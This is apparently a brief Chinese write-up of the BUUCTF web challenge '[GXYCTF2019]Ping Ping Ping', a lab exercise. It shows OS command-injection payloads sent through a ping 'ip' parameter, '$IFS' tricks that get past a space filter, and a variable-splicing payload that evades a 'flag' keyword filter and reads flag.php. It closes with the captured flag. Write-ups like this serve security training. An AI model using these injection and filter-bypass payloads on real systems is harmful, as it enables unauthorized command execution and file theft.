Buuctf-web-[GXYCTF2019]Ping Ping Ping

首先打开,然后后面跟着 

/?ip=127.0.0.1|ls
找目录

Buuctf-web-[GXYCTF2019]Ping Ping Ping

 

 我们看到flag.php与index.php两个php文件。我们接着找flag.php

Buuctf-web-[GXYCTF2019]Ping Ping Ping

 

 看到提示空格被禁用绕过空格的方法大概有以下几种:

$IFS$(任意数字)    cat${IFS}$1flag,尝试

Buuctf-web-[GXYCTF2019]Ping Ping Ping

 

 发现flag也被骚扰了,然后打开index.php,看看内容

Buuctf-web-[GXYCTF2019]Ping Ping Ping

 

 

发现被过滤了好多,然后发现有个变量a,尝试替换拼接flag中的g

/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

Buuctf-web-[GXYCTF2019]Ping Ping Ping

 

 

flag{61584ea2-f679-45f5-b8c1-32bd1a13a0f5}

Buuctf-web-[GXYCTF2019]Ping Ping Ping

上一篇:php生成图片缩略图(亲试贼好用)


下一篇:ajax的路径跳转